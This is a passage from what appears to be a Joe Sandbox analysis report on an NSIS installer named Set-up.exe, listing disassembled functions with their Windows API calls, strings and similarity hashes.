                                      • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                      • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                      • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                      • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                      • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                      • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                      • API String ID: 3734993849-3206598305
                                      • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                      • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                      • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                      • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                      Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                      • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                      • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                      • DeleteFileW.KERNEL32(?), ref: 00402F56
                                      Strings
                                      • created uninstaller: %d, "%s", xrefs: 00402F3B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID: created uninstaller: %d, "%s"
                                      • API String ID: 3294113728-3145124454
                                      • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                      • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                      • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                      • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                      Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426EE3,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                      • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                      Strings
                                      • `G, xrefs: 0040246E
                                      • Error registering DLL: Could not load %s, xrefs: 004024DB
                                      • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                      • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                      • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                      • API String ID: 1033533793-4193110038
                                      • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                      • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                      • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                      • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                      Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                      • GetSysColor.USER32(00000000), ref: 00403E2C
                                      • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                      • SetBkMode.GDI32(?,?), ref: 00403E44
                                      • GetSysColor.USER32(?), ref: 00403E57
                                      • SetBkColor.GDI32(?,?), ref: 00403E67
                                      • DeleteObject.GDI32(?), ref: 00403E81
                                      • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                      • String ID:
                                      • API String ID: 2320649405-0
                                      • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                      • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                      • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                      • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                      Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426EE3,74DF23A0,00000000), ref: 00404FD6
                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FE6
                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426EE3,74DF23A0,00000000), ref: 00404FF9
                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                        • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                        • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                      • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                      Strings
                                      • Exec: success ("%s"), xrefs: 00402263
                                      • Exec: command="%s", xrefs: 00402241
                                      • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                      • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                      • API String ID: 2014279497-3433828417
                                      • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                      • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                      • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                      • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                      Function 0040487A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                      • GetMessagePos.USER32 ref: 0040489D
                                      • ScreenToClient.USER32(?,?), ref: 004048B5
                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                      • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                      • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                      • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                      Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                      • MulDiv.KERNEL32(0000F400,00000064,046036ED), ref: 00403295
                                      • wsprintfW.USER32 ref: 004032A5
                                      • SetWindowTextW.USER32(?,?), ref: 004032B5
                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                      Strings
                                      • verifying installer: %d%%, xrefs: 0040329F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                      • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                      • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                      • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                      Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                      • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                      • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                      • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Char$Next$Prev
                                      • String ID: *?|<>/":
                                      • API String ID: 589700163-165019052
                                      • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                      • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                      • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                      • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                      Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                      • GlobalFree.KERNEL32(00000000), ref: 00402387
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: FreeGloballstrcpyn
                                      • String ID: Exch: stack < %d elements$Pop: stack empty$SportGloryVaccine
                                      • API String ID: 1459762280-1018532151
                                      • Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                      • Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
                                      • Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
                                      • Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D
                                      Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                      • RegCloseKey.ADVAPI32(?), ref: 00401504
                                      • RegCloseKey.ADVAPI32(?), ref: 00401529
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                      • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                      • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                      • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                      Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                      • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                      • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                      • GlobalFree.KERNEL32(00000000), ref: 00402387
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Set-up.jbxd
                                      Similarity
                                      • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 3376005127-0
                                      • Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                      • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                      • Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
                                      • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                      Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                      • WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                      • lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                      • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1710196423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1710160761.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710222914.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710239621.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1710372422.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
